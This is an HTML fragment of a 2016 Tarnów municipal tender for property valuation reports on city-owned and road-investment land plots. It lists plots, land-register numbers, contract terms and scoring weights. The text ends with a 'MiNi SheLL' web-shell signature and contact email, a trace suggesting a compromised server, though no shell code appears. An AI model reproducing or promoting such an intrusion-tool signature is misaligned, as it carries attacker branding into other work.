                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający dopuszcza zmiany osób uczestniczących przy wykonywaniu umowy, które są w niej wymienione - w trakcie realizacji umowy. Zmiana musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje zmianę taką wyłącznie wtedy, gdy kwalifikacje i doświadczenie proponowanych osób będą nie gorsze niż wymagane postanowieniami Specyfikacji Istotnych Warunków Zamówienia.
2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy dotyczących zmiany sposobu i zakresu wykonania zamówienia w przypadku zmiany przepisów prawnych powodujących konieczność dokonania zmian w umowie.
3. Zmiany treści umowy dopuszczone w pkt 1 - 2 nie mogą prowadzić do zwiększenia wynagrodzenia określonego w umowie.
4. Zamawiający przewiduje także zmianę postanowień umowy w przypadku zmiany stawek podatku od towarów i usług.
5. Każda ze stron zobowiązana jest niezwłocznie poinformować o okolicznościach stanowiących podstawę do dokonania zmiany w umowie.
6. Wszelkie zmiany umowy mogą być dokonywane wyłącznie w formie aneksu do umowy pod rygorem nieważności z uwzględnieniem art. 144 ustawy Pzp. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/11/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Zamawiający nie przewiduje zawarcia umowy ramowej oraz ustanowienia dynamicznego systemu zakupów.</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie nr 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 1
Wykonanie dwóch operatów szacunkowych określających wartość rynkową prawa własności nieruchomości gruntowych oraz prawa użytkowania wieczystego nieruchomości gruntowych, stanowiących własność Gminy Miasta Tarnowa. Operaty szacunkowe sporządzane są w celu przekształcenia prawa użytkowania wieczystego w prawo własności i dotyczy nieruchomości oznaczonych jako:
1) działki nr 88/6 i 89/2 obrębu 232 o łącznej powierzchni 1901 m2 objęte księgą wieczystą nr TR1T/00067962/4, zabudowane budynkiem wielomieszkaniowym,
2) działka nr 92/24 obrębu 109 o powierzchni 20 m2 objęta księgą wieczystą nr TR1T/00046723/4, zabudowana garażem.
Z wizji na nieruchomości należy sporządzić stosowny protokół.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  487.80<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia </td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 2
Wykonanie jednego operatu szacunkowego określającego wartość rynkową niezabudowanej nieruchomości, stanowiącej własność Gminy Miasta Tarnowa, położonej w Tarnowie w rejonie ul. Równoległej w obrębie 287 oznaczonej jako działka nr 13/6 o powierzchni 656 m2, objętej księgą wieczystą nr TR1T/00145130/4. Wyceniana nieruchomość nie ma dostępu do drogi publicznej, zgodnie z miejscowym planem zagospodarowania terenu leży w obszarze oznaczonym symbolem 2.MN.PG.6 - tereny zabudowy mieszkaniowej jednorodzinnej, znajdujące się w terenie górniczym złoża gazu ziemnego. W celu zabudowy niezbędne jest uzyskanie dostępu do drogi publicznej. Wyceniana nieruchomość jest przeznaczona do zbycia w trybie przetargu ustnego nieograniczonego
Z wizji na nieruchomości należy sporządzić stosowny protokół.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  325.20<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 3
Wykonanie dziesięciu operatów szacunkowych określających wartość rynkową niezabudowanych nieruchomości przejętych na rzecz Gminy Miasta Tarnowa z mocy prawa na podstawie art. 98 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2015 r. poz. 1774) - przeznaczonych zgodnie z miejscowym planem zagospodarowania terenu pod drogi publiczne, celem ustalenia wysokości należnego odszkodowania i dotyczy nieruchomości oznaczonych jako:
1) działki nr 178/6 i 178/9 obrębu 200 objęte księgą wieczystą nr TR1T/00036096/6,
2) działka nr 22/10 obrębu 98 objęta księgą wieczystą nr TR1T/00097540/9,
3) działki nr 131/7 i 131/5 obrębu 73 objęte księgą wieczystą nr TR1T/00032938/3,
4) działki nr 50/25 i 50/28 obrębu 155 objęte księgą wieczystą nr TR1T/00070496/0,
5) działka nr 106/6 obrębu 199 objęta księgą wieczystą nr TR1T/00123869/3,
6) działka nr 5/2 obrębu 172 objęta księgą wieczystą nr TR1T/00000653/8,
7) działka nr 6/2 obrębu 172 objęta księgą wieczystą nr TR1T/00000654/5,
8) działka nr 460/1 obrębu 4 objęta księgą wieczystą nr TR1T/00024409/7,
9) działka nr 95/20 obrębu 73 objęta księgą wieczystą nr TR1T/00037726/9,
10) działka nr 14/72 obrębu 325 objęta księgą wieczystą nr TR1T/00096638.
Z wizji na nieruchomości należy sporządzić stosowny protokół. Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  2439.02<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie nr 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 4
Wykonanie jednego operatu szacunkowego określającego wartość rynkową niezabudowanej nieruchomości stanowiącej własność Gminy Miasta Tarnowa położonej w Tarnowie przy ul. Sienkiewicza, oznaczonej jako działka nr 20/1 obrębu 281 o powierzchni 47 m2 objętej księgą wieczystą nr TR1T/00007424/3. Nieruchomość przeznaczona jest do zbycia w trybie przetargu ustnego ograniczonego na poprawienie warunków zagospodarowania nieruchomości przyległych - działek położonych w obrębie 281 nr 5 (czterech współwłaścicieli), nr 20/6 (jeden właściciel) i nr 21/16 (jeden właściciel), jako uzupełniająca do nieruchomości przyległych.
Z wizji na nieruchomości należy sporządzić stosowny protokół.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  203.25<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zadanie nr 5<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 5
Wykonanie dwudziestu dwóch operatów szacunkowych określających wartość gruntu wraz z jego częściami składowymi posiadającymi opisy szczegółowe, w celu ustalenia wysokości odszkodowania zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2013 r. poz. 687, z późn. zm.) oraz § 36 ust. 1 rozporządzenia Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109, z późn. zm.). 
Przedmiotowe działki przeszły na rzecz Gminy Miasta Tarnowa na podstawie decyzji Prezydenta Miasta Tarnowa z dnia 30 sierpnia 2016 r. znak: 2/D/2016 o zezwoleniu na realizację inwestycji drogowej pn.: Rozbudowa ulic Spokojne, Elektrycznej, Wyszyńskiego i Czystej w Tarnowie. Wyceny należy dokonać na dzień wydania decyzji. Wycena dotyczy następujących nieruchomości:
Lp.	Obręb	Nr działki przed podziałem	Nr działki po podziale	Powierzchnia [m2]	Księga wieczysta
1.	79	156/4	156/22	518	TR1T/00127306/7
	79	156/14	156/20	51	
2.	79	156/9	156/24	306	TR1T/00078917/4
3.	79	156/13	156/18	103	TR1T/00032986/4
	79	136/9	136/12	317	
4.	79	160/2		26	TR1T/00004664/6
5.	79	178/9		24	TR1T/00056659/7
	106	1/15	1/85	99	
6.	79	158/1		3774	TR1T/00035682/4
	79	158/2		155	
	79	160/1		2143	
	79	178/2		210	
7.	79	165/8		120	TR1T/00055680/6
8.	79	178/8		38	TR1T/00087200/1
	106	1/9	1/97	188	
9.	79	165/14		1888	TR1T/00125478/9
10.	94	86	86/1	762	TR1T/00004894/7
11.	106	1/10		22	TR1T/00004053/0
12.	106	1/66		241	TR1T/00103476/5
	106	1/62	1/93	65	
	106	1/67	1/95	485	
13.	106	1/59		52	TR1T/00076824/1
14.	106	69/1		157	TR1T/00041483/4
15.	106	1/13	1/81	168	TR1T/00056657/3
16.	106	1/33	1/87	58	TR1T/00076829/6
17.	106	1/14	1/83	120	TR1T/00056658/0
18.	106	71/8	71/16	447	TR1T/00097051/4
19.	106	1/60	1/91	110	TR1T/00103183/4
20.	106	69/2	69/6	128	TR1T/00119506/0
21.	107	4/6		121	TR1T/00079349/8
	107	4/7		70	
	107	3/3		381	
	107	2/11	2/33	1126	
22.	107	3/8		972	TR1T/00006547/4
	107	4/10		1054	
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  3577.24<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zadanie nr 6<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 6
Wykonanie czternastu operatów szacunkowych określających wartość gruntu wraz z jego częściami składowymi posiadającymi opisy szczegółowe, w celu ustalenia wysokości odszkodowania zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2013 r. poz. 687, z późn. zm.) oraz § 36 ust. 1 rozporządzenia Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109, z późn. zm.). 
Przedmiotowe działki przeszły na rzecz Gminy Miasta Tarnowa na podstawie decyzji Prezydenta Miasta Tarnowa z dnia 4 sierpnia 2016 r. znak: WAB.III.6740.18.2016.TK o zezwoleniu na realizację inwestycji drogowej pn.: Budowa ulicy Murarskiej z przebudową infrastruktury technicznej (w tym budowa kanalizacji opadowej do potoku Strusinka) w Tarnowie. Wyceny należy dokonać na dzień wydania decyzji. Wycena dotyczy następujących nieruchomości:
Lp.	Obręb	Nr działki przed podziałem	Nr działki po podziale	Powierzchnia [m2]	Księga wieczysta
1	265	51	51/1	38	TR1T/00004319/3
2		58/3	58/8	155	TR1T/00011351/1
3		60/4	60/4	295	TR1T/00076214/2
4		61/2	61/9	159	TR1T/00053842/6
5		62/6	62/6	190	TR1T/00145265/9
6		36	36/4	12	TR1T/00117507/3
7		37/3	37/13	14	TR1T/00038369/5
8		37/4	37/11	9	TR1T/00046151/3
9		37/2	37/9	13	TR1T/00044156/4
10		67/2	67/3	20	TR1T/00081239/1
11		68/1	68/11	36	TR1T/00054096/8
12		68/5	68/9	10	TR1T/00058650/8
13		45	45/1	162	TR1T/00102152/1
14		63	63/1	31	TR1T/00011356/6
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  2276.42<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com